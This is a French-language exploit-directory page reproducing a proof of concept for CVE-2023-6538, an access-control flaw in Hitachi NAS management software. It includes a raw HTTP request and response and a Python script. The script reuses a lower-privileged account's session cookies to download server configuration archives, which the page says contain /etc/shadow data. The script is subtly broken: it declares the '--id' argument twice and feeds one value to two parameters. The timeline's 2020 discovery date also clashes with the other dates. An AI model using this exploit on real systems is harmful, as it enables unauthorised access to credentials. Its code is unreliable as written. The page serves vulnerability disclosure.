Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2023-6538 — Preuve de concept pour CVE-2023-6538, une IDOR dans la sauvegarde et la restauration de la configuration SMU de Hitachi NAS, permettant le téléchargement non autorisé d'archives de configuration contenant des données sensibles. | Kitploit
Outils/GitHubGitHub/arszilla/cve-2023-6538
ReconnaissanceAnalyse des VulnérabilitésExploitationExploitation d'Applications WebCollecte d'InformationsTests d'Intrusion
GitHubarszilla/cve-2023-6538

CVE-2023-6538

Preuve de concept pour CVE-2023-6538, une IDOR dans la sauvegarde et la restauration de la configuration SMU de Hitachi NAS, permettant le téléchargement non autorisé d'archives de configuration contenant des données sensibles.

Voir le dépôt
11il y a 2 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2023-6538

CVE-2023-6538 est une vulnérabilité de type Insecure Direct Object Reference (IDOR) trouvée dans la fonctionnalité Configuration Backup & Restore de l'System Management Unit (SMU) du NAS Hitachi (HNAS). Cette vulnérabilité affecte les versions de SMU antérieures à 14.8.7825.01.

Exploitation

Cet exploit nécessite que l'attaquant contrôle les identifiants d'un compte utilisateur qui n'est ni Read-Only ni Global Administrator, c'est-à-dire :

  • Storage Administrator
  • Server Administrator
  • Server + Storage Administrator

Par conception, les utilisateurs ayant le rôle Global Administrator devraient pouvoir accéder à la fonctionnalité Configuration Backup & Restore de SMU, située à https://<HOSTNAME/FQDN/IP>/mgr/app/template/simple%2CDownloadConfigScreen.vm?serverid=1 et envoyer la requête suivante, qui créerait et téléchargerait la sauvegarde de la configuration du serveur sélectionné (c'est-à-dire un serveur connecté au SMU) :

root@kitploit:~
GET /mgr/app/template/simple%2CDownloadConfigScreen.vm?serverid=1 HTTP/1.1
Host: REDACTED
Cookie: JSESSIONID=REDACTED; JSESSIONIDSSO=REDACTED
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Dnt: 1
Referer: https://REDACTED/mgr/app/action/serveradmin.ConfigRestoreAction/eventsubmit_doperform/ignored
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

Si la requête réussit, le SMU répond avec la réponse suivante et commence le téléchargement de registry_data.tgz :

root@kitploit:~
HTTP/1.1 200 
Cache-Control: PRIVATE
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Strict-Transport-Security: max-age=31536000;includeSubDomains
X-Frame-Options: SAMEORIGIN
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
P3P: CP="NOI DSP CUR ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Pragma: cache
Content-Disposition: attachment;filename=registry_data.tgz
Content-Type: application/download
Content-Length: 3169247
Date: Fri, 14 Apr 2023 09:30:03 GMT
Connection: close
Server: SMU

[DATA]

Cependant, en raison d'un oubli dans la logique métier de SMU, un attaquant ayant accès à un compte Storage Administrator, Server Administrator ou Server + Storage Administrator peut mettre à jour les cookies JSESSIONID et JSESSIONIDSSO pour correspondre aux cookies de l'utilisateur dont il dispose, lui permettant ainsi de télécharger l'archive de configuration. De plus, l'attaquant peut également mettre à jour le paramètre serverid dans la requête pour énumérer et télécharger l'archive de configuration de différents serveurs connectés au SMU.

Ainsi, un script comme CVE-2023-6538.py pourrait être utilisé pour exploiter cette vulnérabilité :

root@kitploit:~
#!/usr/bin/python3
#
# Title:            Hitachi NAS (HNAS) System Management Unit (SMU) Configuration Backup & Restore IDOR Vulnerability 
# CVE:              CVE-2023-6538
# Date:             2023-12-13
# Exploit Author:   Arslan Masood (@arszilla)
# Vendor:           https://www.hitachivantara.com/
# Version:          < 14.8.7825.01
# Tested On:        13.9.7021.04     

import argparse
from os import getcwd

import requests

parser = argparse.ArgumentParser(
    description="CVE-2023-6538 PoC",
    usage="./CVE-2023-6538.py --host <Hostname/FQDN/IP> --id <JSESSIONID> --sso <JSESSIONIDSSO>"
    )

# Create --host argument:
parser.add_argument(
    "--host",
    required=True,
    type=str,
    help="Hostname/FQDN/IP Address. Provide the port, if necessary, i.e. 127.0.0.1:8443, example.com:8443"
    )

# Create --id argument:
parser.add_argument(
    "--id",
    required=True,
    type=str,
    help="JSESSIONID cookie value"
    )

# Create --sso argument:
parser.add_argument(
    "--sso",
    required=True,
    type=str,
    help="JSESSIONIDSSO cookie value"
    )

# Create --id argument:
parser.add_argument(
    "--id",
    required=True,
    type=str,
    help="Server ID value"
    )

args = parser.parse_args()

def download_file(hostname, jsessionid, jsessionidsso, serverid):
    # Set the filename:
    filename = "registry_data.tgz"

    # Vulnerable SMU URL:
    smu_url = f"https://{hostname}/mgr/app/template/simple%2CDownloadConfigScreen.vm?serverid={serverid}"

    # GET request cookies
    smu_cookies = {
        "JSESSIONID":       jsessionid,
        "JSESSIONIDSSO":    jsessionidsso
        }

    # GET request headers:
    smu_headers = {
        "User-Agent":                   "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0",
        "Accept":                       "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
        "Accept-Language":              "en-US,en;q=0.5",
        "Accept-Encoding":              "gzip, deflate",
        "Dnt":                          "1",
        "Referer":                      f"https://{hostname}/mgr/app/action/serveradmin.ConfigRestoreAction/eventsubmit_doperform/ignored",
        "Upgrade-Insecure-Requests":    "1",
        "Sec-Fetch-Dest":               "document",
        "Sec-Fetch-Mode":               "navigate",
        "Sec-Fetch-Site":               "same-origin",
        "Sec-Fetch-User":               "?1",
        "Te":                           "trailers",
        "Connection":                   "close"
        }

    # Send the request:
    with requests.get(smu_url, headers=smu_headers, cookies=smu_cookies, stream=True, verify=False) as file_download:
        with open(filename, 'wb') as backup_archive:
            # Write the zip file to the CWD:
            backup_archive.write(file_download.content)

    print(f"{filename} has been downloaded to {getcwd()}")

if __name__ == "__main__":
    download_file(args.host, args.id, args.sso, args.id)

La justification du score CVSS v3.1 de 7.6 pourrait être mieux comprise en examinant registry_data.tgz :

root@kitploit:~
$ tree -a
.
├── backup.properties
├── registry5.11.db1
├── registry5.13.db1
├── registry5.14.db1
├── registry5.15.db1
├── registry5.1.db1
├── registry5.2.db1
├── registry5.3.db1
├── registry5.4.db1
├── registry5.5.db1
├── registry5.6.db1
├── registry5.7.db1
├── registry5.8.db1
└── registry5.db1

1 directory, 14 files

L'archive .tgz contient divers paramètres et informations sur le serveur connecté au SMU :

registry5

Comme on le voit dans l'image caviardée ci-dessus, registry5.db1 contient le contenu de /etc/shadow (qui a été trouvé via une expression régulière) du serveur sélectionné.

Notes

Cette vulnérabilité est une « vulnérabilité sœur » de CVE-2023-5808.

Références

  • CVE-2023-5808
  • CVE-2023-6538
  • Hitachi Vantara Security Bulletin for CVE-2023-6538

Chronologie

  • 2020-04-12 - Vulnérabilité découverte
  • 2023-04-20 - Vulnérabilité signalée à [email protected]
  • 2023-08-11 - Attribution initiale du numéro CVE
  • 2023-12-06 - Réattribution des numéros CVE
  • 2023-12-11 - Réattribution des numéros CVE
  • 2023-12-11 - Publication du CVE
  • 2023-12-13 - Divulgation publique
Télécharger l’outil